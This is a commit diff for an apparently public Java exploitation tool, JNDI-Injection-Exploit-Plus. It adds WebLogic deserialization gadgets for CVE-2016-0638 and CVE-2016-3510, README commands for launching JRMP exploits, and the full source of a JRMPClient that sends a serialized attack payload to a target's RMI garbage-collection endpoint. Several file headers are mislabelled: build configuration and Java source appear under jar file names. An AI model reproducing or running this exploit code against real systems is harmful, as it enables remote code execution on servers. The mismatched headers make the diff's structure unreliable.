add some new gadget

1. Add JRMPListener exploit
2. Add JRMPClient Gadget
3. Add Jdku21 Gadget
4. Add Weblogic1 Gadget (CVE-2016-0638)
5. Add Weblogic2 Gadget (CVE-2016-3510)

Author: cckuailong

README.md

@@ -35,7 +35,7 @@ Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere
 
 #### 3. Deserailization Gadget (total: 37)
 
-P.S. More Gadgets than ysoserial, welcome to PR more! ^_^
+P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
 payload | author | dependencies 
 ------ | -------- | ------ 
@@ -45,22 +45,24 @@ C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-
 Click1              |@artsploit                  |click-nodeps:2.3.0, javax.servlet-api:3.1.0
 Clojure             |@JackOfMostTrades           |clojure:1.8.0
 CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
-CommonsBeanutils2   |@cckuailong                 |commons-beanutils:1.9.2
+CommonsBeanutils2 :arrow_up:   |@cckuailong                 |commons-beanutils:1.9.2
 CommonsCollections1 |@frohoff                    |commons-collections:3.1
 CommonsCollections2 |@frohoff                    |commons-collections4:4.0
 CommonsCollections3 |@frohoff                    |commons-collections:3.1
 CommonsCollections4 |@frohoff                    |commons-collections4:4.0
 CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
 CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
 CommonsCollections7 |@scristalli, @hanyrax, @EdoardoVignati |commons-collections:3.1
-CommonsCollections8 |@cckuailong                 |commons-collections4:4.0
-CommonsCollections9 |@cckuailong                 |commons-collections:3.1
-CommonsCollections10|@cckuailong                 |commons-collections:3.2.1
+CommonsCollections8 :arrow_up: |@cckuailong                 |commons-collections4:4.0
+CommonsCollections9 :arrow_up: |@cckuailong                 |commons-collections:3.1
+CommonsCollections10 :arrow_up:|@cckuailong                 |commons-collections:3.2.1
 FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
 Groovy1             |@frohoff                    |groovy:2.3.9
 Hibernate1          |@mbechler|
 Hibernate2          |@mbechler|
 JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+Jdk7u21             |@frohoff|
+JRMPClient          |@mbechler|
 JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
 JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
 Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
@@ -69,14 +71,16 @@ MozillaRhino2       |@_tint0                     |js:1.7R2
 Myfaces1            |@mbechler|
 Myfaces2            |@mbechler|
 ROME1               |@mbechler                   |rome:1.0
-ROME2               |@firebasky                  |rome:1.0
+ROME2 :arrow_up:               |@firebasky                  |rome:1.0
 Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
 Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
-Spring3             |@cckuailong                 |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
+Spring3 :arrow_up:             |@cckuailong                 |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
 URLDNS              |@gebl						 |jre only vuln detect
 Vaadin1             |@kai_ullrich                |vaadin-server:7.7.14, vaadin-shared:7.7.14
+Weblogic1 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
+Weblogic2 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
-WildFly1            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
+WildFly1 :arrow_up:            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
 #### 4. generate and export payloads
 
@@ -91,7 +95,7 @@ You can generate the deserialization payloads with binary or base64 type of outp
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -121,7 +125,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
 ```
 
 where:
@@ -132,6 +136,22 @@ where:
 - **-D** - The deserial Gadget payload name.
 - **-O** - (Optional) The deserial output type, default is binary
 
+## Deserialization Exploits
+
+### JRMP
+
+- JRMPListener
+
+```shell
+java -cp JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+```
+
+- JRMPClient
+
+```shell
+java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+```
+
 ## Examples
 
 ### JNDI Links
@@ -141,7 +161,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -172,7 +192,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:

libs/com.oracle.weblogic.iiop-common.jar

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.3-SNAPSHOT</version>
+    <version>1.4-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -229,6 +229,18 @@
             <version>1.2</version>
         </dependency>
 
+        <!-- Application Server dependencies -->
+        <dependency>
+            <groupId>com.oracle.weblogic</groupId>
+            <artifactId>iiop-common</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
+        <dependency>
+            <groupId>wlfullclient</groupId>
+            <artifactId>wlfullclient</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
+
         <!-- test -->
         <dependency>
             <groupId>junit</groupId>
@@ -266,6 +278,55 @@
                     </execution>
                 </executions>
             </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-install-plugin</artifactId>
+                <executions>
+                    <execution>
+                        <id>install-weblogic1</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/wlfullclient.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>wlfullclient</groupId>
+                            <artifactId>wlfullclient</artifactId>
+                            <version>1.0-SNAPSHOT</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>install-weblogic2</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/com.oracle.weblogic.iiop-common.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>com.oracle.weblogic</groupId>
+                            <artifactId>iiop-common</artifactId>
+                            <version>1.0-SNAPSHOT</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <version>3.0.0-M1</version>
+                <configuration>
+                    <trimStackTrace>false</trimStackTrace>
+                    <systemPropertyVariables>
+                        <java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
+                    </systemPropertyVariables>
+                </configuration>
+            </plugin>
         </plugins>
     </build>
 

libs/wlfullclient.jar

@@ -0,0 +1,135 @@
+package exploit;
+
+
+import sun.rmi.transport.TransportConstants;
+import payloads.ObjectPayload.Utils;
+
+import javax.net.SocketFactory;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.*;
+
+
+/**
+ * Generic JRMP client
+ * 
+ * Pretty much the same thing as {@link RMIRegistryExploit} but 
+ * - targeting the remote DGC (Distributed Garbage Collection, always there if there is a listener)
+ * - not deserializing anything (so you don't get yourself exploited ;))
+ * 
+ * @author mbechler
+ *
+ */
+@SuppressWarnings ( {
+    "restriction"
+} )
+public class JRMPClient {
+
+    public static final void main ( final String[] args ) {
+        if ( args.length < 4 ) {
+            System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
+            System.exit(-1);
+        }
+
+        Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
+        String hostname = args[ 0 ];
+        int port = Integer.parseInt(args[ 1 ]);
+        try {
+            System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
+            makeDGCCall(hostname, port, payloadObject);
+        }
+        catch ( Exception e ) {
+            e.printStackTrace(System.err);
+        }
+        Utils.releasePayload(args[2], payloadObject);
+    }
+
+    public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException, UnknownHostException, SocketException {
+        InetSocketAddress isa = new InetSocketAddress(hostname, port);
+        Socket s = null;
+        DataOutputStream dos = null;
+        try {
+            s = SocketFactory.getDefault().createSocket(hostname, port);
+            s.setKeepAlive(true);
+            s.setTcpNoDelay(true);
+
+            OutputStream os = s.getOutputStream();
+            dos = new DataOutputStream(os);
+
+            dos.writeInt(TransportConstants.Magic);
+            dos.writeShort(TransportConstants.Version);
+            dos.writeByte(TransportConstants.SingleOpProtocol);
+
+            dos.write(TransportConstants.Call);
+
+            @SuppressWarnings ( "resource" )
+            final ObjectOutputStream objOut = new MarshalOutputStream(dos);
+
+            objOut.writeLong(2); // DGC
+            objOut.writeInt(0);
+            objOut.writeLong(0);
+            objOut.writeShort(0);
+
+            objOut.writeInt(1); // dirty
+            objOut.writeLong(-669196253586618813L);
+            
+            objOut.writeObject(payloadObject);
+
+            os.flush();
+        }
+        finally {
+            if ( dos != null ) {
+                dos.close();
+            }
+            if ( s != null ) {
+                s.close();
+            }
+        }
+    }
+
+    static final class MarshalOutputStream extends ObjectOutputStream {
+        
+        
+        private URL sendUrl;
+
+        public MarshalOutputStream (OutputStream out, URL u) throws IOException {
+            super(out);
+            this.sendUrl = u;
+        }
+
+        MarshalOutputStream ( OutputStream out ) throws IOException {
+            super(out);
+        }
+
+        @Override
+        protected void annotateClass ( Class<?> cl ) throws IOException {
+            if ( this.sendUrl != null ) {
+                writeObject(this.sendUrl.toString());
+            } else if ( ! ( cl.getClassLoader() instanceof URLClassLoader ) ) {
+                writeObject(null);
+            }
+            else {
+                URL[] us = ( (URLClassLoader) cl.getClassLoader() ).getURLs();
+                String cb = "";
+                
+                for ( URL u : us ) {
+                    cb += u.toString();
+                }
+                writeObject(cb);
+            }
+        }
+
+
+        /**
+         * Serializes a location from which to load the specified class.
+         */
+        @Override
+        protected void annotateProxyClass ( Class<?> cl ) throws IOException {
+            annotateClass(cl);
+        }
+    }
+
+ 
+}